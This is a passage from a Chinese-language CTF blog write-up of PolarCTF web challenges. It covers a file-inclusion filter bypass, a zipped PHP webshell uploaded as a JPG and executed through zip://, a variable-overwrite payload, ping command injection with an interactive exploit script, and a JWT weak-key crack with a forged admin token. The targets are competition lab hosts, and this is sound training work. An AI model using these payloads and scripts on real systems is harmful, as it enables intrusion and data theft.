\u5f3a\u5236\u540e\u7f00\uff1a\u4ee3\u7801\u5728\u7ed3\u5c3e\u4f1a\u5f3a\u5236\u62fc\u63a5 .php<\/code> ($real_file = $file . \".php\";<\/code>)\uff0c\u6240\u4ee5\u6211\u4eec\u6700\u7ec8\u5305\u542b\u7684\u6587\u4ef6\u5fc5\u7136\u662f PHP \u6587\u4ef6\uff08\u5728 CTF \u4e2d\u901a\u5e38\u5c31\u662f\u6839\u76ee\u5f55\u4e0b\u7684 flag.php<\/code>\uff09\u3002<\/p>\n\n\n\n
\u524d\u7f00\u8981\u6c42\uff1a\u6700\u7ec8\u8fc7\u6ee4\u540e\u7684 $file<\/code> \u5fc5\u987b\u4ee5 static\/<\/code> \u5f00\u5934\u3002<\/p>\n\n\n\n
\u5173\u952e<\/p>\n\n\n\n
$ban_keywords = array(\"eval\", \"system\", \"exec\", \"passthru\", \"shell_exec\", \"assert\", \"..\/\");\nforeach ($ban_keywords as $keyword) {\n    if (stristr($file, $keyword)) {\n        $count = 0;\n        $file = str_replace($keyword, \"\", $file, $count); \n        break; \/\/ <--- \u81f4\u547d\u903b\u8f91\u6f0f\u6d1e\n    }\n}\n\n\u53ea\u8981\u5339\u914d\u5230\u4e86\u6570\u7ec4\u4e2d\u7684\u4efb\u610f\u4e00\u4e2a\u5173\u952e\u5b57\uff0c\u5b83\u5c31\u4f1a\u5c06\u5176\u66ff\u6362\u4e3a\u7a7a\uff0c\u7136\u540e\u76f4\u63a5 break \u9000\u51fa\u6574\u4e2a foreach \u5faa\u73af\uff01\u8fd9\u610f\u5473\u7740\u6392\u5728\u524d\u9762\u7684\u5173\u952e\u5b57\u5982\u679c\u88ab\u89e6\u53d1\uff0c\u6392\u5728\u540e\u9762\u7684\u8fc7\u6ee4\u89c4\u5219\uff08\u6bd4\u5982 ..\/\uff09\u5c31\u5f7b\u5e95\u5931\u6548\u4e86\u3002<\/code><\/pre>\n\n\n\n
\u6d4b\u8bd5\u6700\u7ec8Payload<\/strong><\/p>\n\n\n\n
?file=static\/eval..\/flag\nhttp://3a0ed2d9-3841-4feb-a049-06fda9ae00ba.game.polarctf.com:8090\/?file=static\/eval..\/flag<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{030e77f73a4cb26a111daf0470c3956f}<\/code><\/pre>\n\n\n\n
Pandora_Box<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd9\u91cc\u968f\u673a\u4e0a\u4f20\u4e00\u4e2a\u56fe\u7247\u8bd5\u8bd5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd9\u91cc\u53d1\u73b0\u5176\u8bbf\u95ee\u662fmd5\u52a0\u5bc6\uff0c\u70b9\u51fb\u8df3\u8f6c\u8bd5\u8bd5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8bbf\u95ee ?file=upload\/xxx.jpg \u65f6\uff0c\u9875\u9762\u5e95\u90e8\u51fa\u73b0 ****System Error Log****\uff1a\nWarning: include(upload\/xxx.jpg.php): failed to open stream: No such file or directory in \/var\/www\/html\/index.php on line 69\n\u53ef\u4ee5\u786e\u5b9a\uff1a\n\u5b58\u5728 LFI\uff1ainclude($_GET['file'] . '.php')\n\u670d\u52a1\u5668\u4f1a\u628a file \u53c2\u6570\u540e\u9762****\u81ea\u52a8\u8ffd\u52a0**** ****.php****\n\u56e0\u6b64\uff0c\u4f20\u5165 file=upload\/xxx.jpg \u65f6\uff0c\u5b9e\u9645\u4f1a\u53bb\u5305\u542b upload\/xxx.jpg.php\uff0c\u6587\u4ef6\u4e0d\u5b58\u5728\u5bfc\u81f4\u62a5\u9519\u3002<\/code><\/pre>\n\n\n\n
zip\u4f2a\u534f\u8bae<\/p>\n\n\n\n
\u6784\u9020\u4e00\u4e2aphp\u7ed3\u5c3e\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
zip\u538b\u7f29\u540e\u6539\u6210jpg\u7ed3\u5c3e<\/p>\n\n\n\n
\u4e0a\u4f20<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u70b9\u51fb\u8df3\u8f6c\u5e76\u7528zip:\/\/\u6267\u884c<\/p>\n\n\n\n
http://02d36ce2-c4fd-474f-a411-04d61912fec3.www.polarctf.com:8090\/?file=zip:\/\/\/var\/www\/html\/upload\/6c90a926b8c167c49c42cc242e711784.jpg%23shell&c=cat%20\/flag<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{47ea7bc31157e1a1a6ca01e26163b726}<\/code><\/pre>\n\n\n\n
The_Gift<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u89e3\u9898\u903b\u8f91\uff1a<\/p>\n\n\n\n
\u6f0f\u6d1e\u70b9\uff1a\u4ee3\u7801\u4e2d\u7684 foreach \u5faa\u73af\u914d\u5408 $key = $value; \u9020\u6210\u4e86\u53d8\u91cf\u8986\u76d6\u6f0f\u6d1e\uff0c\u5141\u8bb8\u6211\u4eec\u7528\u5916\u90e8\u4f20\u5165\u7684\u53c2\u6570\u8986\u76d6\u5185\u90e8\u5df2\u6709\u7684\u53d8\u91cf\u3002\n\u62ff Flag \u6761\u4ef6\uff1a\u6700\u540e\u7684 if \u8bed\u53e5\u8981\u6c42 $config \u5fc5\u987b\u662f\u6570\u7ec4\uff0c\u5e76\u4e14 $config['isAdmin'] === 'true'\u3002\u4f46\u539f\u672c\u7684 $config \u662f\u4e00\u4e2a\u5bf9\u8c61\uff08Object\uff09\u3002\n\u6784\u9020\u8986\u76d6\uff1a\u5229\u7528 PHP \u63a5\u6536 URL \u53c2\u6570\u8f6c\u6362\u4e3a\u6570\u7ec4\u7684\u7279\u6027\uff0c\u6784\u9020 ?config[isAdmin]=true\u3002\n\u8986\u76d6\u8fc7\u7a0b\uff1a\u4f20\u5165\u540e\uff0c$key = $value; \u76f8\u5f53\u4e8e\u5728\u4ee3\u7801\u4e2d\u6267\u884c\u4e86 $config = ['isAdmin' => 'true'];\uff0c\u76f4\u63a5\u5c06\u5bf9\u8c61\u8986\u76d6\u4e3a\u4e86\u7b26\u5408\u6761\u4ef6\u7684\u6570\u7ec4\u3002\n\u6ce8\u610f\u907f\u5751\uff1a\u5343\u4e07\u4e0d\u8981\u4f20\u5165 user_api_key \u53c2\u6570\uff0c\u5426\u5219\u4ee3\u7801\u4f1a\u6267\u884c $config->validateApiKey()\uff0c\u5728\u6570\u7ec4\u4e0a\u8c03\u7528\u65b9\u6cd5\u4f1a\u5bfc\u81f4 Fatal Error \u62a5\u9519\u4e2d\u65ad\uff0c\u51fa\u4e0d\u6765 flag\u3002<\/code><\/pre>\n\n\n\n
\u6700\u7ec8 Payload\uff1a<\/p>\n\n\n\n
\/?config[isAdmin]=true<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{0538dfd69d21172b128c29d536b9b31a}<\/code><\/pre>\n\n\n\n
\u6770\u5c3c\u9f9f\u7cfb\u7edf<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Ping\u547d\u4ee4\u6ce8\u5165<\/p>\n\n\n\n
\u53d1\u73b0Ping\u6d4b\u8bd5\u529f\u80fd\u70b9\uff0c\u540e\u7aef\u672a\u5bf9IP\u53c2\u6570\u8fdb\u884c\u8fc7\u6ee4\uff0c\u76f4\u63a5\u62fc\u63a5\u6267\u884c\u3002\n\u6784\u9020Payload\u5229\u7528\u5206\u53f7 ; \u6216\u7ba1\u9053\u7b26 | \u6267\u884c\u4efb\u610f\u7cfb\u7edf\u547d\u4ee4\uff0c\u5982 127.0.0.1; ls -la \/\u3002\n\u679a\u4e3e\u76ee\u5f55\u53d1\u73b0\u6839\u76ee\u5f55\u7684 \/flag.txt \u4e3a\u5e72\u6270\u9879\uff08\u5047flag\uff09\u3002\n\u6df1\u5ea6\u6392\u67e5\u7cfb\u7edf\u6587\u4ef6\uff0c\u5b9a\u4f4d\u5230\u771f\u5b9eflag\u4f4d\u4e8e \/var\/tmp\/flag\u3002\n\u8bfb\u53d6\u6587\u4ef6\u83b7\u53d6\u6700\u7ec8flag\uff1a127.0.0.1; cat \/var\/tmp\/flag \uff08\u6216\u4f7f\u7528 xxd \u8bfb\u53d6\u9a8c\u8bc1\uff09\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import requests\nfrom bs4 import BeautifulSoup\n\nURL = \"http:\/\/078eb0cf-3f5a-4434-8199-8090631f9335.game.polarctf.com:8090\/\"\n\ndef run(cmd):\n    payload = f\"127.0.0.1; {cmd}\"\n    params = {\"ip\": payload, \"ping\": \"\"}\n\n    try:\n        r = requests.get(URL, params=params, timeout=10)\n        soup = BeautifulSoup(r.text, 'html.parser')\n        div = soup.find('div', class_='ping-result')\n\n        if div:\n            return div.get_text(strip=True)\n        return \"\"\n    except:\n        return \"\"\n\ndef main():\n    while True:\n        cmd = input(\"$ \")\n        if cmd.lower() in ['exit', 'quit']:\n            break\n        if cmd.strip():\n            print(run(cmd))\n\nif __name__ == \"__main__\":\n    main()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{459fc13bc7e1265b410fa7eb9e87a63e}<\/code><\/pre>\n\n\n\n
coke\u7684\u7c89\u4e1d\u56e2<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u767b\u5f55\u4e0a\u662f\u8fd9\u4e2a\u9875\u9762<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8d8a\u6743\u5f3a\u4e70\u534710\u7ea7<\/p>\n\n\n\n
\u6ce8\u518c\u666e\u901a\u8d26\u53f7\u767b\u5f55\u8fdb\u5165 shop.php\u3002\u5728\u7b2c52\u9875\u627e\u5230\u552f\u4e00\u768410\u7ea7\u706f\u724c\uff08card_id=520\uff09\u3002\u524d\u7aef\u63d0\u793a\u4f59\u989d\u4e0d\u8db3\u6309\u94ae\u53d8\u7070\uff0c\u4f46\u540e\u7aef buy.php \u6ca1\u505a\u4f59\u989d\u6821\u9a8c\u3002\u76f4\u63a5\u6293\u5305\u5f3a\u884cPOST\u8d2d\u4e70\uff1a\ncard_id=520&level=10&price=6666\n\u53d1\u5305\u540e\u65e0\u89c6\u4f59\u989d\u9650\u5236\uff0c\u76f4\u63a5\u5347\u523010\u7ea7\u3002<\/code><\/pre>\n\n\n\n
\u7206\u7834\u5e76\u4f2a\u9020JWT<\/strong><\/p>\n\n\n\n
\u6ee110\u7ea7\u540e\u51fa\u73b0 coke.php \u5165\u53e3\uff0c\u8bbf\u95ee\u63d0\u793a\u53ea\u6709 admin \u624d\u80fd\u8fdb\u3002\n\u6293\u5305\u53d1\u73b0\u8eab\u4efd\u9274\u6743\u7528\u7684\u662f JWT\u3002\u62ff\u666e\u901a\u7528\u6237\u7684 JWT \u53bb\u8dd1\u5f31\u53e3\u4ee4\u5b57\u5178\uff0c\u7206\u51fa\u5bf9\u79f0\u5bc6\u94a5\u4e3a\uff1acoke\u3002\n\u5c06 payload \u7684 username \u6539\u4e3a admin\uff0c\u91cd\u65b0\u7b7e\u540d\u4f2a\u9020\u51fa\u7ba1\u7406\u5458 Token\uff1a\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.nOLz_J3G5VDs3zimRc_EJzRnYxFbWbJkR3SHADwHmhg<\/code><\/pre>\n\n\n\n
\u5e26\u4e0a\u4f2a\u9020\u597d\u7684 admin JWT\uff08\u66ff\u6362 Cookie \u548c X-Jwt-Token\uff09\uff0c\u518d\u6b21\u8bbf\u95ee coke.php<\/code>\uff0c\u76f4\u63a5\u51fa flag\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import requests\nimport re\nimport random\nimport string\n\nBASE_URL = \"http:\/\/a185985a-e8f8-4ef0-936f-cbf40c713fc9.game.polarctf.com:8090\"\n\ndef generate_random_string(length=6):\n    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))\n\ndef main():\n    session = requests.Session()\n    username = f\"user_{generate_random_string()}\"\n    password = \"password123\"\n\n    session.post(f\"{BASE_URL}\/register.php\", data={\n        \"username\": username,\n        \"password\": password,\n        \"confirm_password\": password\n    })\n\n    session.post(f\"{BASE_URL}\/login.php\", data={\n        \"username\": username,\n        \"password\": password\n    })\n\n    session.post(f\"{BASE_URL}\/buy.php\", data={\n        \"card_id\": 520,\n        \"level\": 10,\n        \"price\": 6666\n    })\n\n    admin_jwt = \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.nOLz_J3G5VDs3zimRc_EJzRnYxFbWbJkR3SHADwHmhg\"\n\n    cookies_dict = session.cookies.get_dict()\n    cookies_dict['jwt_token'] = admin_jwt \n\n    cookie_str = \"; \".join([f\"{k}={v}\" for k, v in cookies_dict.items()])\n\n    headers = {\n        \"Cookie\": cookie_str,\n        \"X-Jwt-Token\": admin_jwt\n    }\n\n    res = requests.get(f\"{BASE_URL}\/coke.php\", headers=headers)\n\n    flag_match = re.search(r'flag{.*?}', res.text)\n    if flag_match:\n        print(flag_match.group())\n    else:\n        print(res.text)\n\nif __name__ == \"__main__\":\n    main()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{the_cat_is_coke}<\/code><\/pre>\n\n\n\n
\u603b\u7ed3<\/h1>\n\n\n\n
\u7d2f\u6b7b\u4e86<\/p>\n","protected":false},"excerpt":{"rendered":"
\u524d\u8a00 \u62ff\u4e86\u7b2c\u4e8c\u540d\uff0c\u9898\u76ee\u96be\u5ea6\u4e0d\u5927\uff0c\u4f46\u662f\u9898\u76ee\u6570\u91cf\u662f\u771f\u7684\u591a\uff0c\u800c\u4e14\u5e73\u53f0\u5bb9\u5668\u8d85\u7ea7\u5361\uff0c\u6bd4\u8d5b\u65f6\u95f4\u662f2026\u5e743\u670821\u65e5 9: […]<\/p>\n","protected":false},"author":1,"featured_media":3215,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,27,1],"tags":[],"class_list":["post-3072","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","category-polarctf","category-learn"],"_links":{"self":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts\/3072","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3072"}],"version-history":[{"count":1,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts\/3072\/revisions"}],"predecessor-version":[{"id":3216,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts\/3072\/revisions\/3216"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/media\/3215"}],"wp:attachment":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3072"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3072"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3072"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}